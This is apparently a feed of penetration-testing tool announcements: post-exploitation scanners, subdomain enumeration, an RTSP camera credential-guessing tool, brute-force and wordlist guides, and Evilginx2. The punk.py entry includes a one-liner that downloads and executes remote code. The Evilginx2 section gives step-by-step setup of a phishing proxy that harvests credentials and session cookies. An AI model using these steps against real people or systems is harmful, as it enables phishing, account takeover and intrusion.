Scavenger – Is A Multi-Threaded Post-Exploitation Scanning Tool For Scavenging Systems, Finding Most Frequently Used Files And Folders As Well As “Interesting” Files Containing Sensitive Information

scavenger : is a multi-threaded post-exploitation scanning tool for scavenging systems, finding most frequently used files and folders as well as “interesting" files containing sensitive information.Problem Definition:Scavenger confronts a challenging issue typically faced by Penetration Testing consultants during internal penetration tests; the issue of having too much access to too many systems with limited days for testing.Requirements:Install CrackMapExec – CrackMapExec Installation PageExamples:$ python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local$ python3 ./scavenger.py smb –target iplist –username administrator –password Password123 –domain test.local –overwriteBlog Post:Link to Trustwave SpiderLabs BlogAcknowledgements – Powered and Inspired by:Impacket (@agsolino)CrackMapExec (@byt3bl33d3r)ccsrch (@adamcaudill)LaZagneDownload Scavenger

Link: http://feedproxy.google.com/~r/PentestTools/~3/jq3tFg5uOhk/scavenger-is-multi-threaded-post.html

Punk.Py – Unix SSH Post-Exploitation Tool

unix SSH post-exploitation 1337 toolhow it workspunk.py is a post-exploitation tool meant to help network pivoting from a compromised unix box. It collect usernames, ssh keys and known hosts from a unix system, then it tries to connect via ssh to all the combinations found. punk.py is wrote in order to work on standard python2 installations.examplesstandard execution: ~$ ./punk.pyskip passwd checks and use a custom home path: ~$ ./punk.py –no-passwd –home /home/ldapusers/execute commands with sudo: ~$ ./punk.py –run “sudo sh -c ‘echo iamROOT>/root/hacked.txt’"one-liner fileless ( with –no-passwd parameter ): ~$ python -c "import urllib2;exec(urllib2.urlopen(‘https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py’).read())" –no-passwdTODOimprove private keys hunting including dsa keysRecursionSSH keys with password bruteforceHashed known_hosts bruteforce ( https://blog.rootshell.be/2010/11/03/bruteforcing-ssh-known_hosts-files/ )Download Punk.Py

Link: http://feedproxy.google.com/~r/PentestTools/~3/5T_W704vAXw/punkpy-unix-ssh-post-exploitation-tool.html

Multiple Ways to Exploit Tomcat Manager

Hello Friends, today through this article I would like to share my experience “how to exploit Tomcat Manger Application” if you have default login credential (tomcat: tomcat).  While playing CTF, many times I found Apache Tomcat is running in target machine that have configured with default login and this can help us to get remote… Continue reading →
The post Multiple Ways to Exploit Tomcat Manager appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/

Knock v.4.1.1 – Subdomain Scan

Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. It is designed to scan for DNS zone transfer and to try to bypass the wildcard DNS record automatically if it is enabled. Now knockpy supports queries to VirusTotal subdomains, you can setting the API_KEY within the config.json file.Very simply$ knockpy domain.comExport full report in JSONIf you want to save full log like this one just type:$ knockpy domain.com –json InstallPrerequisitesPython 2.7.6DependenciesDnspython$ sudo apt-get install python-dnspythonInstalling$ git clone https://github.com/guelfoweb/knock.git$ cd knock$ nano knockpy/config.json <- set your virustotal API_KEY$ sudo python setup.py installNote that it's recommended to use Google DNS: 8.8.8.8 and 8.8.4.4 Knockpy arguments$ knockpy -husage: knockpy [-h] [-v] [-w WORDLIST] [-r] [-c] [-j] domain___________________________________________knock subdomain scanknockpy v.4.1Author: Gianni 'guelfoweb' AmatoGithub: https://github.com/guelfoweb/knock___________________________________________positional arguments: domain target to scan, like domain.comoptional arguments: -h, --help show this help message and exit -v, --version show program's version number and exit -w WORDLIST specific path to wordlist file -r, --resolve resolve ip or domain name -c, --csv save output in csv -f, --csvfields add fields name to the first row of csv output file -j, --json export full report in JSONexample: knockpy domain.com knockpy domain.com -w wordlist.txt knockpy -r domain.com or IP knockpy -c domain.com knockpy -j domain.comFor virustotal subdomains support you can setting your API_KEY in the config.json file. ExampleSubdomain scan with internal wordlist$ knockpy domain.comSubdomain scan with external wordlist$ knockpy domain.com -w wordlist.txtResolve domain name and get response headers$ knockpy -r domain.com [or IP]+ checking for virustotal subdomains: YES[ "partnerissuetracker.corp.google.com", "issuetracker.google.com", "r5---sn-ogueln7k.c.pack.google.com", "cse.google.com", .......too long....... "612.talkgadget.google.com", "765.talkgadget.google.com", "973.talkgadget.google.com"]+ checking for wildcard: NO+ checking for zonetransfer: NO+ resolving target: YES{ "zonetransfer": { "enabled": false, "list": [] }, "target": "google.com", "hostname": "google.com", "virustotal": [ "partnerissuetracker.corp.google.com", "issuetracker.google.com", "r5---sn-ogueln7k.c.pack.google.com", "cse.google.com", "mt0.google.com", "earth.google.com", "clients1.google.com", "pki.google.com", "www.sites.google.com", "appengine.google.com", "fcmatch.google.com", "dl.google.com", "translate.google.com", "feedproxy.google.com", "hangouts.google.com", "news.google.com", .......too long....... "100.talkgadget.google.com", "services.google.com", "301.talkgadget.google.com", "857.talkgadget.google.com", "600.talkgadget.google.com", "992.talkgadget.google.com", "93.talkgadget.google.com", "storage.cloud.google.com", "863.talkgadget.google.com", "maps.google.com", "661.talkgadget.google.com", "325.talkgadget.google.com", "sites.google.com", "feedburner.google.com", "support.google.com", "code.google.com", "562.talkgadget.google.com", "190.talkgadget.google.com", "58.talkgadget.google.com", "612.talkgadget.google.com", "765.talkgadget.google.com", "973.talkgadget.google.com" ], "alias": [], "wildcard": { "detected": {}, "test_target": "eqskochdzapjbt.google.com", "enabled": false, "http_response": {} }, "ipaddress": [ "216.58.205.142" ], "response_time": "0.0351989269257", "http_response": { "status": { "reason": "Found", "code": 302 }, "http_headers": { "content-length": "256", "location": "http://www.google.it/?gfe_rd=cr&ei=60WIWdmnDILCXoKbgfgK", "cache-control": "private", "date": "Mon, 07 Aug 2017 10:50:19 GMT", "referrer-policy": "no-referrer", "content-type": "text/html; charset=UTF-8" } }}Save scan output in CSV$ knockpy -c domain.comExport full report in JSON$ knockpy -j domain.com Talk aboutEthical Hacking and Penetration Testing Guide Book by Rafay Baloch.Knockpy comes pre-installed on the following security distributions for penetration test:BackBox LinuxPentestBox for WindowsBuscador Investigative Operating System OtherThis tool is currently maintained by Gianni 'guelfoweb' Amato, who can be contacted at guelfoweb@gmail.com or twitter @guelfoweb. Suggestions and criticism are welcome.Download Knock

Link: http://www.kitploit.com/2018/12/knock-v411-subdomain-scan.html

Cameradar v2.1.0 – Hacks Its Way Into RTSP Videosurveillance Cameras

  An RTSP stream access tool that comes with its libraryCameradar allows you toDetect open RTSP hosts on any accessible target hostDetect which device model is streamingLaunch automated dictionary attacks to get their stream route (e.g.: /live.sdp)Launch automated dictionary attacks to get the username and password of the camerasRetrieve a complete and user-friendly report of the resultsDocker Image for CameradarInstall docker on your machine, and run the following command:docker run -t ullaakut/cameradar -t <other command-line options>See command-line options.e.g.: docker run -t ullaakut/cameradar -t 192.168.100.0/24 -l will scan the ports 554 and 8554 of hosts on the 192.168.100.0/24 subnetwork and attack the discovered RTSP streams and will output debug logs.YOUR_TARGET can be a subnet (e.g.: 172.16.100.0/24), an IP (e.g.: 172.16.100.10), or a range of IPs (e.g.: 172.16.100.10-20).If you want to get the precise results of the nmap scan in the form of an XML file, you can add -v /your/path:/tmp/cameradar_scan.xml to the docker run command, before ullaakut/cameradar.If you use the -r and -c options to specify your custom dictionaries, make sure to also use a volume to add them to the docker container. Example: docker run -t -v /path/to/dictionaries/:/tmp/ ullaakut/cameradar -r /tmp/myroutes -c /tmp/mycredentials.json -t mytargetInstalling the binary on your machineOnly use this solution if for some reason using docker is not an option for you or if you want to locally build Cameradar on your machine.DependenciesgodepInstalling depOSX: brew install dep and brew upgrade depOthers: Download the release package for your OS hereSteps to installMake sure you installed the dependencies mentionned above.go get github.com/Ullaakut/cameradarcd $GOPATH/src/github.com/Ullaakut/cameradardep ensurecd cameradargo installThe cameradar binary is now in your $GOPATH/bin ready to be used. See command line options here.LibraryDependencies of the librarycurl-dev / libcurl (depending on your OS)nmapgithub.com/pkg/errorsgopkg.in/go-playground/validator.v9github.com/andelf/go-curlInstalling the librarygo get github.com/Ullaakut/cameradarAfter this command, the cameradar library is ready to use. Its source will be in:$GOPATH/src/pkg/github.com/Ullaakut/cameradarYou can use go get -u to update the package.Here is an overview of the exposed functions of this library:DiscoveryYou can use the cameradar library for simple discovery purposes if you don’t need to access the cameras but just to be aware of their existence.This describes the nmap time presets. You can pass a value between 1 and 5 as described in this table, to the NmapRun function.AttackIf you already know which hosts and ports you want to attack, you can also skip the discovery part and use directly the attack functions. The attack functions also take a timeout value as a parameter.Data modelsHere are the different data models useful to use the exposed functions of the cameradar library.Dictionary loadersThe cameradar library also provides two functions that take file paths as inputs and return the appropriate data models filled.ConfigurationThe RTSP port used for most cameras is 554, so you should probably specify 554 as one of the ports you scan. Not specifying any ports to the cameradar application will scan the 554 and 8554 ports.docker run -t –net=host ullaakut/cameradar -p “18554,19000-19010" -t localhost will scan the ports 18554, and the range of ports between 19000 and 19010 on localhost.You can use your own files for the ids and routes dictionaries used to attack the cameras, but the Cameradar repository already gives you a good base that works with most cameras, in the /dictionaries folder.docker run -t -v /my/folder/with/dictionaries:/tmp/dictionaries \ ullaakut/cameradar \ -r "/tmp/dictionaries/my_routes" \ -c "/tmp/dictionaries/my_credentials.json" \ -t 172.19.124.0/24This will put the contents of your folder containing dictionaries in the docker image and will use it for the dictionary attack instead of the default dictionaries provided in the cameradar repo.Check camera accessIf you have VLC Media Player, you should be able to use the GUI or the command-line to connect to the RTSP stream using this format : rtsp://username:password@address:port/routeWith the above result, the RTSP URL would be rtsp://admin:12345@173.16.100.45:554/live.sdpCommand line options"-t, –target": Set target. Required. Target can be a file (see instructions on how to format the file), an IP, an IP range, a subnetwork, or a combination of those."-p, –ports": (Default: 554,8554) Set custom ports."-s, –speed": (Default: 4) Set custom nmap discovery presets to improve speed or accuracy. It’s recommended to lower it if you are attempting to scan an unstable and slow network, or to increase it if on a very performant and reliable network. See this for more info on the nmap timing templates."-T, –timeout": (Default: 2000) Set custom timeout value in miliseconds after which an attack attempt without an answer should give up. It’s recommended to increase it when attempting to scan unstable and slow networks or to decrease it on very performant and reliable networks."-r, –custom-routes": (Default: <CAMERADAR_GOPATH>/dictionaries/routes) Set custom dictionary path for routes"-c, –custom-credentials": (Default: <CAMERADAR_GOPATH>/dictionaries/credentials.json) Set custom dictionary path for credentials"-o, –nmap-output": (Default: /tmp/cameradar_scan.xml) Set custom nmap output path"-l, –log": Enable debug logs (nmap requests, curl describe requests, etc.)"-h" : Display the usage informationFormat input fileThe file can contain IPs, hostnames, IP ranges and subnetwork, separated by newlines. Example:0.0.0.0localhost192.17.0.0/16192.168.1.140-255192.168.2-3.0-255Environment VariablesCAMERADAR_TARGETThis variable is mandatory and specifies the target that cameradar should scan and attempt to access RTSP streams on.Examples:172.16.100.0/24192.168.1.1localhost192.168.1.140-255192.168.2-3.0-255CAMERADAR_PORTSThis variable is optional and allows you to specify the ports on which to run the scans.Default value: 554,8554It is recommended not to change these except if you are certain that cameras have been configured to stream RTSP over a different port. 99.9% of cameras are streaming on these ports.CAMERADAR_NMAP_OUTPUT_FILEThis variable is optional and allows you to specify on which file nmap will write its output.Default value: /tmp/cameradar_scan.xmlThis can be useful only if you want to read the files yourself, if you don’t want it to write in your /tmp folder, or if you want to use only the RunNmap function in cameradar, and do its parsing manually.CAMERADAR_CUSTOM_ROUTES, CAMERADAR_CUSTOM_CREDENTIALSThese variables are optional, allowing to replace the default dictionaries with custom ones, for the dictionary attack.Default values: <CAMERADAR_GOPATH>/dictionaries/routes and <CAMERADAR_GOPATH>/dictionaries/credentials.jsonCAMERADAR_SPEEDThis optional variable allows you to set custom nmap discovery presets to improve speed or accuracy. It’s recommended to lower it if you are attempting to scan an unstable and slow network, or to increase it if on a very performant and reliable network. See this for more info on the nmap timing templates.Default value: 4CAMERADAR_TIMEOUTThis optional variable allows you to set custom timeout value in miliseconds after which an attack attempt without an answer should give up. It’s recommended to increase it when attempting to scan unstable and slow networks or to decrease it on very performant and reliable networks.Default value: 2000CAMERADAR_LOGSThis optional variable allows you to enable a more verbose output to have more information about what is going on.It will output nmap results, cURL requests, etc.Default: falseContributionBuildDocker buildTo build the docker image, simply run docker build -t . cameradar in the root of the project.Your image will be called cameradar and NOT ullaakut/cameradar.Go buildTo build the project without docker:Install depOSX: brew install dep and brew upgrade depOthers: Download the release package for your OS heredep ensurego build to build the librarycd cameradar && go build to build the binaryThe cameradar binary is now in the root of the directory.See the contribution document to get started.Frequently Asked QuestionsCameradar does not detect any camera!That means that either your cameras are not streaming in RTSP or that they are not on the target you are scanning. In most cases, CCTV cameras will be on a private subnetwork, isolated from the internet. Use the -t option to specify your target.Cameradar detects my cameras, but does not manage to access them at all!Maybe your cameras have been configured and the credentials / URL have been changed. Cameradar only guesses using default constructor values if a custom dictionary is not provided. You can use your own dictionaries in which you just have to add your credentials and RTSP routes. To do that, see how the configuration works. Also, maybe your camera’s credentials are not yet known, in which case if you find them it would be very nice to add them to the Cameradar dictionaries to help other people in the future.What happened to the C++ version?You can still find it under the 1.1.4 tag on this repo, however it was less performant and stable than the current version written in Golang.How to use the Cameradar library for my own project?See the example in /cameradar. You just need to run go get github.com/Ullaakut/cameradar and to use the cmrdr package in your code. You can find the documentation on godoc.I want to scan my own localhost for some reason and it does not work! What’s going on?Use the –net=host flag when launching the cameradar image, or use the binary by running go run cameradar/cameradar.go or installing itI don’t see a colored output :(You forgot the -t flag before ullaakut/cameradar in your command-line. This tells docker to allocate a pseudo-tty for cameradar, which makes it able to use colors.I don’t have a camera but I’d like to try Cameradar!Simply run docker run -p 8554:8554 -e RTSP_USERNAME=admin -e RTSP_PASSWORD=12345 -e RTSP_PORT=8554 ullaakut/rtspatt and then run cameradar and it should guess that the username is admin and the password is 12345. You can try this with any default constructor credentials (they can be found here)ExamplesRunning cameradar on your own machine to scan for default portsdocker run –net=host -t ullaakut/cameradar -t localhostRunning cameradar with an input file, logs enabled on port 8554docker run -v /tmp:/tmp –net=host -t ullaakut/cameradar -t /tmp/test.txt -p 8554 -lDownload Cameradar

Link: http://feedproxy.google.com/~r/PentestTools/~3/1bUGqwOggUY/cameradar-v210-hacks-its-way-into-rtsp.html

Comprehensive Guide on Ncrack – A Brute Forcing Tool

In this article we will be exploring the topic of network authentication using Ncrack. Security professionals depends on Ncrack while auditing their clients. The tools is very simple, yet robust in what it offers a penetration tester. It was design to help the companies in securing their networks by analysis all their hosts and networking devices… Continue reading →
The post Comprehensive Guide on Ncrack – A Brute Forcing Tool appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/comprehensive-guide-on-ncrack-a-brute-forcing-tool/

Evilginx2 v2.2.0 – Standalone Man-In-The-Middle Attack Framework Used For Phishing Login Credentials Along With Session Cookies, Allowing For The Bypass Of 2-Factor Authentication

evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection.This tool is a successor to Evilginx, released in 2017, which used a custom version of nginx HTTP server to provide man-in-the-middle functionality to act as a proxy between a browser and phished website. Present version is fully written in GO as a standalone application, which implements its own HTTP and DNS server, making it extremely easy to set up and use.VideoSee evilginx2 in action here:Evilginx 2 – Next Generation of Phishing 2FA Tokens from breakdev.org on Vimeo.Write-upIf you want to learn more about this phishing technique, I’ve published an extensive blog post about evilginx2 here:https://breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokensPhishlet Masters – Hall of FamePlease thank the following contributors for devoting their precious time to deliver us fresh phishlets! (in order of first contributions)@cust0msync – Amazon, Reddit@white_fi – Twitterrvrsh3ll @424f424f – CitrixInstallationYou can either use a precompiled binary package for your architecture or you can compile evilginx2 from source.You will need an external server where you’ll host your evilginx2 installation. I personally recommend Digital Ocean and if you follow my referral link, you will get an extra $10 to spend on servers for free.Evilginx runs very well on the most basic Debian 8 VPS.Installing from sourceIn order to compile from source, make sure you have installed GO of version at least 1.10.0 (get it from here) and that $GOPATH environment variable is set up properly (def. $HOME/go).After installation, add this to your ~/.profile, assuming that you installed GO in /usr/local/go:export GOPATH=$HOME/goexport PATH=$PATH:/usr/local/go/bin:$GOPATH/binThen load it with source ~/.profiles.Now you should be ready to install evilginx2. Follow these instructions:sudo apt-get install git makego get -u github.com/kgretzky/evilginx2cd $GOPATH/src/github.com/kgretzky/evilginx2makeYou can now either run evilginx2 from local directory like:sudo ./bin/evilginx -p ./phishlets/or install it globally:sudo make installsudo evilginxInstructions above can also be used to update evilginx2 to the latest version.Installing with DockerYou can launch evilginx2 from within Docker. First build the container:docker build . -t evilginx2Then you can run the container:docker run -it -p 53:53/udp -p 80:80 -p 443:443 evilginx2Phishlets are loaded within the container at /app/phishlets, which can be mounted as a volume for configuration.Installing from precompiled binary packagesGrab the package you want from here and drop it on your box. Then do:unzip .zip -d <package_name>cd <package_name>If you want to do a system-wide install, use the install script with root privileges:chmod 700 ./install.shsudo ./install.shsudo evilginxor just launch evilginx2 from the current directory (you will also need root privileges):chmod 700 ./evilginxsudo ./evilginxUsageIMPORTANT! Make sure that there is no service listening on ports TCP 443, TCP 80 and UDP 53. You may need to shutdown apache or nginx and any service used for resolving DNS that may be running. evilginx2 will tell you on launch if it fails to open a listening socket on any of these ports.By default, evilginx2 will look for phishlets in ./phishlets/ directory and later in /usr/share/evilginx/phishlets/. If you want to specify a custom path to load phishlets from, use the -p <phishlets_dir_path> parameter when launching the tool.Usage of ./evilginx: -debug Enable debug output -developer Enable developer mode (generates self-signed certificates for all hostnames) -p string Phishlets directory pathYou should see evilginx2 logo with a prompt to enter commands. Type help or help <command> if you want to see available commands or more detailed information on them.Getting startedTo get up and running, you need to first do some setting up.At this point I assume, you’ve already registered a domain (let’s call it yourdomain.com) and you set up the nameservers (both ns1 and ns2) in your domain provider’s admin panel to point to your server’s IP (e.g. 10.0.0.1):ns1.yourdomain.com = 10.0.0.1ns2.yourdomain.com = 10.0.0.1Set up your server’s domain and IP using following commands:config domain yourdomain.comconfig ip 10.0.0.1Now you can set up the phishlet you want to use. For the sake of this short guide, we will use a LinkedIn phishlet. Set up the hostname for the phishlet (it must contain your domain obviously):phishlets hostname linkedin my.phishing.hostname.yourdomain.comAnd now you can enable the phishlet, which will initiate automatic retrieval of LetsEncrypt SSL/TLS certificates if none are locally found for the hostname you picked:phishlets enable linkedinYour phishing site is now live. Think of the URL, you want the victim to be redirected to on successful login and get the phishing URL like this (victim will be redirected to https://www.google.com):phishlets get-url linkedin https://www.google.comRunning phishlets will only respond to tokenized links, so any scanners who scan your main domain will be redirected to URL specified as redirect_url under config. If you want to hide your phishlet and make it not respond even to valid tokenized phishing URLs, use phishlet hide/unhide <phishlet> command.You can monitor captured credentials and session cookies with:sessionsTo get detailed information about the captured session, with the session cookie itself (it will be printed in JSON format at the bottom), select its session ID:sessions <id>The captured session cookie can be copied and imported into Chrome browser, using EditThisCookie extension.Important! If you want evilginx2 to continue running after you log out from your server, you should run it inside a screen session.CreditsHuge thanks to Simone Margaritelli (@evilsocket) for bettercap and inspiring me to learn GO and rewrite the tool in that language!Download Evilginx2

Link: http://www.kitploit.com/2018/12/evilginx2-v220-standalone-man-in-middle.html

UPDATE: Infection Monkey 1.6.1

PenTestIT RSS Feed
I’m sure you must have read my previous post title the List of Adversary Emulation Tools. In that post, I briefly mentioned about the Guardicore Infection Monkey. Good news now is that it has been updated! We now have Infection Monkey 1.6.1. An important change about this version is that this is an AWS onlyRead more about UPDATE: Infection Monkey 1.6.1
The post UPDATE: Infection Monkey 1.6.1 appeared first on PenTestIT.

Link: http://pentestit.com/update-infection-monkey-1-6-1/

Comprehensive Guide on Dymerge

Hello friends! This article is comprehensive guide on the Dymerge tool. This is a handy little tool that helps you manage all the dictionaries that you’ve created reading through our blog and using all the amazing tools we’ve written about. Table of Content What is Dymerge Installing and Launching Dymerge Standard Merge Fast Mode Removing… Continue reading →
The post Comprehensive Guide on Dymerge appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/comprehensive-guide-on-the-dymerge/

Comprehensive Guide on Pydictor – A wordlist Generating Tool

In this article we will explore another dictionary building tool “Pydictor”. These tools are always fun to work with, this is another robust tool perfect for generating custom dictionaries. The thing that stands out most about this tool is the customization options it offers, from the most common to the advance. Table of Content What… Continue reading →
The post Comprehensive Guide on Pydictor – A wordlist Generating Tool appeared first on Hacking Articles.

Link: https://www.hackingarticles.in/comprehensive-guide-on-pydictor-a-wordlist-generating-tool/